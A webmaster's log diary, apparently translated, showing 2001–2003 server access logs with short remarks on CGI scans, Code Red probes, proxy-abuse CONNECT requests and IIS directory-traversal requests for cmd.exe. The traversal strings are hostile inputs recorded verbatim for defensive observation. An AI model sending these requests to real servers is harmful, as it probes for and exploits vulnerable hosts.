211.91.254.xxx - - [10/Apr/2003:21:11:24 +0900] "HEAD /Cgi-Bin/cmd32.exe HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:25 +0900] "HEAD /Cgi-Bin/cmd32.exe?/c+dir HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:28 +0900] "HEAD /Cgi-Bin/cmd.exe HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:29 +0900] "HEAD /cgi-bin/classifieds.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:30 +0900] "HEAD /cgi-bin/cmd.exe HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:30 +0900] "HEAD /cgi-bin/classifieds HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:31 +0900] "HEAD /cgi-bin/clickresponder.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:31 +0900] "HEAD /cgi-bin/classified.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:34 +0900] "HEAD /cgi-bin/classified.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:39 +0900] "HEAD /cgi-bin/Cgitest.exe HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:55 +0900] "HEAD /Cgi-Bin/cgitest.exe HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:57 +0900] "HEAD /cgi-bin/Cgitest.exe HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:11:58 +0900] "HEAD /cgi-bin/ceilidh.exe/ceilidh/?N4 HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:02 +0900] "HEAD /cgi-bin/carbo.dll HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:02 +0900] "HEAD /cgi-bin/cart.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:10 +0900] "HEAD /cgi-bin/carbo.dll HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:12 +0900] "HEAD /cgi-bin/campas HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:20 +0900] "HEAD /cgi-bin/calender_admin.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:21 +0900] "HEAD /cgi-bin/calender.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:22 +0900] "HEAD /cgi-bin/calendar HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:23 +0900] "HEAD /cgi-bin/calendar HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:33 +0900] "HEAD /cgi-bin/cachemgr.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:40 +0900] "HEAD /cgi-bin/bnbform HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:46 +0900] "HEAD /cgi-bin/bnbform HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:47 +0900] "HEAD /cgi-bin/bizdb1-search.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:50 +0900] "HEAD /cgi-bin/bigconf.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:55 +0900] "HEAD /cgi-bin/bigconf.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:57 +0900] "HEAD /cgi-bin/bash HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:12:59 +0900] "HEAD /cgi-bin/ax-admin.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:02 +0900] "HEAD /cgi-bin/axs.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:03 +0900] "HEAD /cgi-bin/ax.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:12 +0900] "HEAD /cgi-bin/authorize/dbmfiles/users HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:13 +0900] "HEAD /cgi-bin/AT-generate.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:15 +0900] "HEAD /cgi-bin/AT-generate.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:29 +0900] "HEAD /cgi-bin/ash HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:41 +0900] "HEAD /cgi-bin/architext_query.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:42 +0900] "HEAD /cgi-bin/archie HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:42 +0900] "HEAD /cgi-bin/archie HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:43 +0900] "HEAD /cgi-bin/AnyForm2 HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:55 +0900] "HEAD /cgi-bin/anyboard.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:55 +0900] "HEAD /cgi-bin/anyboard.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:55 +0900] "HEAD /cgi-bin/AnyBoard.cgi HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:56 +0900] "HEAD /cgi-bin/AnyForm HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:13:58 +0900] "HEAD /cgi-bin/allmanageup.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:14:04 +0900] "HEAD /cgi-bin/allmanage/settings.cfg HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:14:15 +0900] "HEAD /cgi-bin/allmanage/settings.cfg HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:14:26 +0900] "HEAD /cgi-bin/allmanage/adp HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:14:27 +0900] "HEAD /cgi-bin/allmanage.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:14:28 +0900] "HEAD /cgi-bin/alibaba.pl\\dir HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:14:31 +0900] "HEAD /cgi-bin/alibaba.pl HTTP/1.1" 404 0
211.91.254.xxx - - [10/Apr/2003:21:14:37 +0900] "HEAD /Cgi-Bin/alibaba.pl HTTP/1.1" 404 0
This is the first time I have seen this pattern. Could it be someone's own custom hacking engine?

217.21.114.xxx - - [26/Feb/2003:16:15:11 +0900] "\x04\x01" 501 -
217.21.114.xxx - - [26/Feb/2003:16:15:33 +0900] "\x05\x01" 501 -
217.21.114.xxx - - [26/Feb/2003:16:15:35 +0900] "CONNECT 207.46.181.13:25 HTTP/1.1" 405 320
217.21.114.xxx - - [27/Feb/2003:15:36:44 +0900] "\x04\x01" 501 -
217.21.114.xxx - - [27/Feb/2003:15:37:05 +0900] "\x05\x01" 501 -
217.21.114.xxx - - [27/Feb/2003:15:37:07 +0900] "CONNECT 207.46.181.13:25 HTTP/1.1" 405 320
218.65.238.xxx - - [01/Mar/2003:03:08:47 +0900] "CONNECT 61.140.60.66:80 HTTP/1.1" 405 320
218.65.238.xxx - - [01/Mar/2003:03:12:57 +0900] "-" 408 -
218.65.238.xxx - - [01/Mar/2003:03:13:22 +0900] "-" 408 -

This is a new kind of attack. I suppose this one is also aimed at some security hole or other.

80.117.206.xxx - - [21/Feb/2003:01:37:50 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308
67.128.50.xxx - - [24/Feb/2003:05:33:17 +0900] "CONNECT maila.microsoft.com:25 HTTP/1.0" 405 308
64.231.68.xxx - - [28/Feb/2003:07:08:33 +0900] "CONNECT maila.microsoft.com:25 / HTTP/1.0" 400 376

As usual, attacks that seem to be looking for tunneling keep coming.

65.116.209.xxx - - [23/Feb/2003:01:52:55 +0900] "GET http://www.yahoo.com/ HTTP/1.1" 200 6471
65.116.209.xxx - - [26/Feb/2003:13:48:20 +0900] "GET http://www.yahoo.com/ HTTP/1.1" 200 6471
219.164.173.xxx - - [28/Feb/2003:11:01:51 +0900] "GET /(0024)http://www.google.ne.jp/ HTTP/1.0" 403 305

The ones that look like proxy searches are also coming as usual.

61.106.193.xxx - - [23/Feb/2003:00:37:04 +0900] "-" 408 -

And the mysterious header-manipulation attacks continue as usual, too.

213.197.10.xxx [10/Feb/2003:23:07:43 +0900] "-" 408 -
61.103.249.xxx [12/Feb/2003:03:00:44 +0900] "-" 408 -

This request makes no sense at all. Does it mean the request header itself has been tampered with?

218.58.209.xxx [21/Jan/2003:21:00:00 +0900] "GET http://www.sina.com.cn/ HTTP/1.1" 200 6134
211.158.36.xxx [22/Jan/2003:08:37:55 +0900] "GET http://www.168ads.com/ HTTP/1.1" 200 6134
61.146.245.xxx [22/Jan/2003:18:32:30 +0900] "GET http://www.intel.com/ HTTP/1.1" 200 6134
4.33.13.xxx [03/Feb/2003:00:21:58 +0900] "GET http://www.linkshare.com/error_click_english.html HTTP/1.0" 404 295

These appear to be accesses that try to use the server as an HTTP proxy.

217.230.123.xxx [20/Jan/2003:00:26:23 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308
217.230.123.xxx [20/Jan/2003:00:38:56 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308
217.234.26.xxx [20/Jan/2003:19:56:24 +0900] "CONNECT irc.huie.hokudai.ac.jp:6667 HTTP/1.0" 405 308
217.234.26.xxx [20/Jan/2003:19:56:24 +0900] "CONNECT irc.huie.hokudai.ac.jp:6667 HTTP/1.0" 405 308
217.234.26.xxx [20/Jan/2003:19:56:24 +0900] "CONNECT irc.huie.hokudai.ac.jp:6667 HTTP/1.0" 405 308
217.234.26.xxx [20/Jan/2003:19:56:24 +0900] "CONNECT irc.huie.hokudai.ac.jp:6667 HTTP/1.0" 405 308
63.187.136.xxx [23/Jan/2003:23:53:59 +0900] "CONNECT mail.calcentralmortgage.com:25 HTTP/1.0" 405 308
194.249.34.xxx [24/Jan/2003:05:10:47 +0900] "CONNECT irc.tokyo.wide.ad.jp:6667: HTTP/1.0" 400 337
194.249.34.xxx [24/Jan/2003:05:10:55 +0900] "CONNECT irc.tokyo.wide.ad.jp:6667: HTTP/1.0" 400 337
200.189.182.xxx [28/Jan/2003:05:51:49 +0900] "CONNECT mail.thumbgalleryhost.com:25 HTTP/1.0" 405 308
151.27.192.xxx [28/Jan/2003:22:38:18 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308
200.189.182.xxx [28/Jan/2003:05:51:49 +0900] "CONNECT mail.thumbgalleryhost.com:25 HTTP/1.0" 405 308
151.27.192.xxx [28/Jan/2003:22:38:18 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308
64.41.36.xxx [30/Jan/2003:23:03:32 +0900] "CONNECT 216.131.86.161:21 HTTP/1.0" 405 308
66.238.216.xxx [02/Feb/2003:12:45:29 +0900] "CONNECT mx1.hotmail.com:25 HTTP/1.1" 400 384
151.27.192.xxx [04/Feb/2003:03:16:44 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308
69.10.14.xxx [07/Feb/2003:13:41:45 +0900] "CONNECT maila.microsoft.com:25 / HTTP/1.0" 400 376
80.135.179.xxx [09/Feb/2003:21:19:27 +0900] "CONNECT 217.0.112.46:6667 HTTP/1.0" 405 308
217.226.1.xxx [09/Feb/2003:22:57:07 +0900] "CONNECT irc.tokyo.wide.ad.jp:6667: HTTP/1.0" 400 337
212.171.48.xxx [10/Feb/2003:10:49:49 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308
80.117.210.xxx [11/Feb/2003:21:40:52 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308

They have shown up now and then for some time, but lately there are a lot of suspicious accesses using CONNECT.

19:50:00 61.115.???.?? - HEAD /index.html 200 10
20:01:29 61.115.???.?? - HEAD /index.html 200 10
20:03:29 61.115.???.?? - HEAD /index.html 200 0
21:08:17 61.115.???.?? - HEAD /index.html 200 0

It is unclear whether this is actually an attack, so I am hiding the IP, but it is a rather suspicious access.

13:23:58 61.33.20.230 - GET /scripts/root.exe 404 490
13:23:58 61.33.20.230 - GET /MSADC/root.exe 404 90
13:23:58 61.33.20.230 - GET /c/winnt/system32/cmd.exe 404 10
13:23:59 61.33.20.230 - GET /d/winnt/system32/cmd.exe 404 0
13:23:59 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:23:59 61.33.20.230 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0
13:24:00 61.33.20.230 - GET /scripts/root.exe 404 10
13:24:00 61.33.20.230 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 10
13:24:00 61.33.20.230 - GET /MSADC/root.exe 404 0
13:24:00 61.33.20.230 - GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500 0
13:24:00 61.33.20.230 - GET /c/winnt/system32/cmd.exe 404 0
13:24:02 61.33.20.230 - GET /scripts/..チ../winnt/system32/cmd.exe 500 70
13:24:02 61.33.20.230 - GET /scripts/winnt/system32/cmd.exe 404 10
13:24:02 61.33.20.230 - GET /d/winnt/system32/cmd.exe 404 10
13:24:05 61.33.20.230 - GET /winnt/system32/cmd.exe 404 0
13:24:05 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:24:05 61.33.20.230 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 10
13:24:05 61.33.20.230 - GET /winnt/system32/cmd.exe 404 0
13:24:05 61.33.20.230 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0
13:24:06 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:24:06 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:24:06 61.33.20.230 - GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500 10
13:24:06 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:24:06 61.33.20.230 - GET /scripts/..チ../winnt/system32/cmd.exe 500 11
13:24:06 61.33.20.230 - GET /scripts/..%2f../winnt/system32/cmd.exe 500 0
13:24:10 61.33.20.230 - GET /scripts/winnt/system32/cmd.exe 404 10
13:24:10 61.33.20.230 - GET /winnt/system32/cmd.exe 404 0
13:24:11 61.33.20.230 - GET /winnt/system32/cmd.exe 404 0
13:24:11 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:24:11 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 10
13:24:15 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 10
13:24:15 61.33.20.230 - GET /scripts/..%2f../winnt/system32/cmd.exe 500 0
13:30:56 61.115.206.14 - GET /default.ida 404 70
13:31:52 61.32.250.42 - GET /scripts/root.exe 404 10
13:31:52 61.32.250.42 - GET /MSADC/root.exe 404 10
13:32:02 61.32.250.42 - GET /c/winnt/system32/cmd.exe 404 0
13:32:06 61.32.250.42 - GET /d/winnt/system32/cmd.exe 404 10
13:32:06 61.32.250.42 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:32:06 61.32.250.42 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0
13:32:10 61.32.250.42 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0
13:32:14 61.32.250.42 - GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500 0
13:32:14 61.32.250.42 - GET /scripts/..チ../winnt/system32/cmd.exe 500 0
13:32:35 61.32.250.42 - GET /scripts/winnt/system32/cmd.exe 404 10
13:32:39 61.32.250.42 - GET /winnt/system32/cmd.exe 404 10
13:33:00 61.32.250.42 - GET /winnt/system32/cmd.exe 404 10
13:33:04 61.32.250.42 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 11
13:33:19 61.32.250.42 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:35:41 61.174.104.218 - GET /scripts/root.exe 404 10
13:35:42 61.174.104.218 - GET /MSADC/root.exe 404 0
13:35:44 61.174.104.218 - GET /c/winnt/system32/cmd.exe 404 0
13:35:45 61.174.104.218 - GET /d/winnt/system32/cmd.exe 404 10
13:35:49 61.174.104.218 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:35:49 61.174.104.218 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0
13:35:51 61.174.104.218 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 10
13:35:52 61.174.104.218 - GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500 0
13:35:52 61.174.104.218 - GET /scripts/..チ../winnt/system32/cmd.exe 500 10
13:35:54 61.174.104.218 - GET /scripts/winnt/system32/cmd.exe 404 10
13:35:55 61.174.104.218 - GET /winnt/system32/cmd.exe 404 0
13:35:56 61.174.104.218 - GET /winnt/system32/cmd.exe 404 0
13:35:57 61.174.104.218 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:35:57 61.174.104.218 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:35:58 61.174.104.218 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:35:58 61.174.104.218 - GET /scripts/..%2f../winnt/system32/cmd.exe 500 10
13:38:03 61.220.130.69 - GET /scripts/root.exe 404 10
13:38:05 61.220.130.69 - GET /MSADC/root.exe 404 10
13:38:07 61.220.130.69 - GET /c/winnt/system32/cmd.exe 404 10
13:38:09 61.220.130.69 - GET /d/winnt/system32/cmd.exe 404 0
13:38:12 61.220.130.69 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:38:14 61.220.130.69 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0
13:38:18 61.220.130.69 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0
13:38:21 61.220.130.69 - GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500 0
13:38:23 61.220.130.69 - GET /scripts/..チ../winnt/system32/cmd.exe 500 0
13:39:14 61.73.97.212 - GET /scripts/root.exe 404 0
13:39:24 61.73.97.212 - GET /MSADC/root.exe 404 10
13:39:24 61.73.97.212 - GET /c/winnt/system32/cmd.exe 404 0
13:39:29 61.73.97.212 - GET /d/winnt/system32/cmd.exe 404 0
13:39:30 61.73.97.212 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 10
13:39:30 61.73.97.212 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0
13:39:31 61.73.97.212 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0
13:39:31 61.73.97.212 - GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500 0
13:39:33 61.73.97.212 - GET /scripts/..チ../winnt/system32/cmd.exe 500 0
13:39:33 61.73.97.212 - GET /scripts/winnt/system32/cmd.exe 404 10
13:39:37 61.73.97.212 - GET /winnt/system32/cmd.exe 404 0
13:39:38 61.73.97.212 - GET /winnt/system32/cmd.exe 404 10
13:39:38 61.73.97.212 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:39:42 61.73.97.212 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 10
13:39:42 61.73.97.212 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0
13:39:43 61.73.97.212 - GET /scripts/..%2f../winnt/system32/cmd.exe 500 0

It has been a while since the last update. There were so many CodeRed attacks that I could not possibly post them all, so I had decided to update when something changed, and now it finally has.

22:28:29 61.115.133.142 - GET /default.ida 404
22:38:49 61.115.238.161 - GET /default.ida 404
22:41:21 61.115.133.142 - GET /default.ida 404
22:42:45 61.218.94.188 - GET /default.ida 404
22:45:00 63.204.48.120 - GET /default.ida 404
22:53:07 61.84.195.84 - GET /default.ida 404
22:56:34 61.115.133.142 - GET /default.ida 404
23:10:09 211.20.244.134 - GET /default.ida 404
23:13:26 61.120.108.5 - GET /default.ida 404
23:26:20 61.220.68.62 - GET /default.ida 404
23:28:06 61.143.233.99 - GET /default.ida 404
23:54:27 61.158.105.39 - GET /default.ida 404
23:57:50 61.115.178.87 - GET /default.ida 404

They came in such numbers that I got tired of them: accesses that look like "Code Red".

21:11:48 66.92.168.87 - GET /default.ida 404
22:34:24 147.46.48.45 - GET /default.ida 404
23:06:27 211.40.36.157 - GET /default.ida 404
23:08:53 211.79.147.1 - GET /default.ida 404

Here they come, in large numbers. This is "Code Red".

Source IP address : 61.151.231.33
2001/07/31 17:02:12 - GET /scripts/..%5c%5c../winnt/system32/cmd.exe 500

Another one-step access. This one also seems to be fairly popular; the volume is small, but the attacks come regularly.

Source IP address : 210.72.224.240
2001/07/27 22:32:49 - GET /winnt/system32/cmd.exe 404
2001/07/27 22:32:54 - GET /winnt/system32/cmd.exe 404
2001/07/27 22:32:55 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500
2001/07/27 22:32:57 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500
2001/07/27 22:32:58 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500
2001/07/27 22:33:09 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500
2001/07/27 22:33:11 - GET /scripts/..チ../winnt/system32/cmd.exe 500
2001/07/27 22:33:15 - GET /winnt/system32/cmd.exe 404
2001/07/27 22:33:17 - GET /scripts/..o../winnt/system32/cmd.exe 404
2001/07/27 22:33:28 - GET /winnt/system32/cmd.exe 404
2001/07/27 22:33:52 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/07/27 22:33:57 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/07/27 22:33:58 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/07/27 22:33:59 - GET /winnt/system32/cmd.exe 404

It is the Solaris worm again. The other side is China, yet again.

Source IP address : 128.97.254.98
2001/07/23 22:53:48 - GET /default.ida 404
Source IP address : 216.252.197.109
2001/07/20 07:01:06 - GET /default.ida 404

Another attack that looks like the "Code Red" worm. See here for details.

Source IP address : 210.178.12.111
2001/07/20 15:05:32 - GET /winnt/system32/cmd.exe 404
2001/07/20 15:05:36 - GET /winnt/system32/cmd.exe 404
2001/07/20 15:05:40 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500
2001/07/20 15:05:42 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500
2001/07/20 15:05:45 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500
2001/07/20 15:05:48 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500
2001/07/20 15:05:51 - GET /scripts/..チ../winnt/system32/cmd.exe 500
2001/07/20 15:05:54 - GET /winnt/system32/cmd.exe 404
2001/07/20 15:05:58 - GET /scripts/..o../winnt/system32/cmd.exe 404
2001/07/20 15:06:03 - GET /winnt/system32/cmd.exe 404
2001/07/20 15:06:07 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/07/20 15:06:12 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/07/20 15:06:17 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/07/20 15:06:21 - GET /winnt/system32/cmd.exe 404
Source IP address : 24.176.130.103
2001/07/20 21:25:45 - GET /winnt/system32/cmd.exe 404
2001/07/20 21:25:45 - GET /winnt/system32/cmd.exe 404
2001/07/20 21:25:46 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500
2001/07/20 21:26:11 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500
2001/07/20 21:26:11 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500
2001/07/20 21:26:12 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500
2001/07/20 21:26:12 - GET /scripts/..チ../winnt/system32/cmd.exe 500
2001/07/20 21:26:13 - GET /winnt/system32/cmd.exe 404
2001/07/20 21:26:17 - GET /scripts/..o../winnt/system32/cmd.exe 404
2001/07/20 21:26:17 - GET /winnt/system32/cmd.exe 404
2001/07/20 21:26:19 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/07/20 21:26:19 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/07/20 21:26:24 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/07/20 21:26:35 - GET /winnt/system32/cmd.exe 404

It is the Solaris worm again (this one).

208.46.6.130 2001/07/19 16:59:21 - GET /default.ida 200
202.181.208.122 2001/07/19 17:09:47 - GET /default.ida 200
129.81.209.8 2001/07/19 17:24:25 - GET /default.ida 200
202.234.168.34 2001/07/19 17:51:18 - GET /default.ida 200
210.159.9.210 2001/07/19 18:02:12 - GET /default.ida 200
209.17.157.204 2001/07/19 18:07:01 - GET /default.ida 200
198.162.104.16 2001/07/19 18:25:07 - GET /default.ida 200
193.128.148.94 2001/07/19 19:59:51 - GET /default.ida 200
196.36.199.25 2001/07/19 20:38:43 - GET /default.ida 200
210.12.4.99 2001/07/19 20:41:18 - GET /default.ida 200
216.120.108.3 2001/07/19 20:46:04 - GET /default.ida 200
64.183.14.67 2001/07/19 20:28:06 - GET /default.ida 200
203.235.201.205 2001/07/19 22:14:20 - GET /default.ida 200
211.254.138.92 2001/07/19 22:17:51 - GET /default.ida 200
65.80.91.58 2001/07/19 22:25:22 - GET /default.ida 200
195.144.47.202 2001/07/19 22:35:35 - GET /default.ida 200
211.61.231.112 2001/07/19 23:32:36 - GET /default.ida 200

This is a new kind of attack. A new worm called "Code Red" that targets a security hole in IIS seems to be going around, so this may be it. See here for details.

Source IP address : 203.69.5.162
2001/07/14 15:17:46 - GET /winnt/system32/cmd.exe 404
2001/07/14 19:01:39 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500

This one is from Taiwan. It does not seem to be the usual worm. With the second try coming four hours later, maybe it is semi-manual?

Source IP address : 210.126.251.154
2001/07/14 05:58:13 - GET /winnt/system32/cmd.exe 404
2001/07/14 05:58:14 - GET /winnt/system32/cmd.exe 404
2001/07/14 05:58:16 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500
2001/07/14 05:58:16 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500
2001/07/14 05:58:17 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500
2001/07/14 05:58:17 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500
2001/07/14 05:58:19 - GET /scripts/..チ../winnt/system32/cmd.exe 500
2001/07/14 05:58:19 - GET /winnt/system32/cmd.exe 404
2001/07/14 05:58:21 - GET /scripts/..o../winnt/system32/cmd.exe 404
2001/07/14 05:58:22 - GET /winnt/system32/cmd.exe 404
2001/07/14 05:58:23 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/07/14 05:58:24 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/07/14 05:58:25 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/07/14 05:58:26 - GET /winnt/system32/cmd.exe 404

It is the Solaris worm again (this one). It is Korea Network Information Center, so this is South Korea. What a nuisance.

There was another strange ftp access.
This time it is from Germany. It is coming in directly over ftp, not the web.

Source IP address : 217.57.152.11
2001/06/22 03:07:39 - GET /winnt/system32/cmd.exe 404
2001/06/22 03:07:41 - GET /winnt/system32/cmd.exe 404
2001/06/22 03:07:42 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500
2001/06/22 03:07:46 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500
2001/06/22 03:07:46 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500
2001/06/22 03:07:47 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500
2001/06/22 03:07:47 - GET /scripts/..チ../winnt/system32/cmd.exe 500
2001/06/22 03:07:48 - GET /winnt/system32/cmd.exe 404
2001/06/22 03:07:50 - GET /scripts/..o../winnt/system32/cmd.exe 404
2001/06/22 03:07:51 - GET /winnt/system32/cmd.exe 404
2001/06/22 03:07:52 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/06/22 03:07:53 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/06/22 03:07:54 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/06/22 03:07:55 - GET /winnt/system32/cmd.exe 404

It is the Solaris worm again (this one). According to the IP, it is Italy.

Source IP address : 209.154.248.209
2001/06/16 12:55:14 - GET /winnt/system32/cmd.exe 404
2001/06/16 12:55:14 - GET /winnt/system32/cmd.exe 404
2001/06/16 12:55:15 - GET /scripts/..タ%9v../winnt/system32/cmd.exe 500
2001/06/16 12:55:15 - GET /scripts/..タ%qf../winnt/system32/cmd.exe 500
2001/06/16 12:55:15 - GET /scripts/..チ%pc../winnt/system32/cmd.exe 500
2001/06/16 12:55:16 - GET /scripts/..チ%8s../winnt/system32/cmd.exe 500
2001/06/16 12:55:16 - GET /scripts/..チ../winnt/system32/cmd.exe 500
2001/06/16 12:55:17 - GET /scripts/..o../winnt/system32/cmd.exe 404
2001/06/16 12:55:17 - GET /winnt/system32/cmd.exe 404
2001/06/16 12:55:19 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
2001/06/16 12:55:19 - GET /winnt/system32/cmd.exe 404
2001/06/16 12:55:20 - GET /scripts/..ッ../winnt/system32/cmd.exe 404
